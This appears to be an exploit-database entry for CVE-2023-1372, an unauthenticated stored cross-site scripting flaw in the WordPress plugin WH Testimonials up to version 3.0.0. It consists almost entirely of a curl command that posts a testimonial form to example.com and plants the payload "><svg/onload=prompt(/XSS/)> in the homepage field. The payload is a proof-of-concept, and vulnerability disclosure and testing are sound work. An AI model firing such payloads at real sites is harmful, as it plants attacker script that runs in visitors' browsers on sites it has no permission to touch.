Exploit for WH Testimonials <= 3.0.0 - Unauthenticated Stored XSS CVE-2023-1372

Name: Exploit for WH Testimonials <= 3.0.0 - Unauthenticated Stored XSS CVE-2023-1372
Rating: 5 (44 reviews)

2023-03-11 | CVSS 5.8

## https://sploitus.com/exploit?id=WPEX-ID:7F8E4A22-4349-483E-8071-07292AE96730
curl -X POST 'http://example.com/add/' \
-H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLKXxMfAqKI63OgZ4' \
-H 'Host: example.com' \
-H 'Content-Length: XXX' \
-d $'------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_clientname"\r\n\r\nFirst Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_company"\r\n\r\nLast Name\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_homepage"\r\n\r\n\"><svg/onload=prompt(/XSS/)>\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_short"\r\n\r\nShort Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_text_full"\r\n\r\nLong Review\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="wh_sfimgurl"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormsoundaryLKXxMfAqKI63OgZ4\r\nContent-Disposition: form-data; name="Wh_addnew"\r\n\r\nAdd Testimonial\r\n------WebKitFormBoundaryLKXxMfAqKI63OgZ4--\r\n'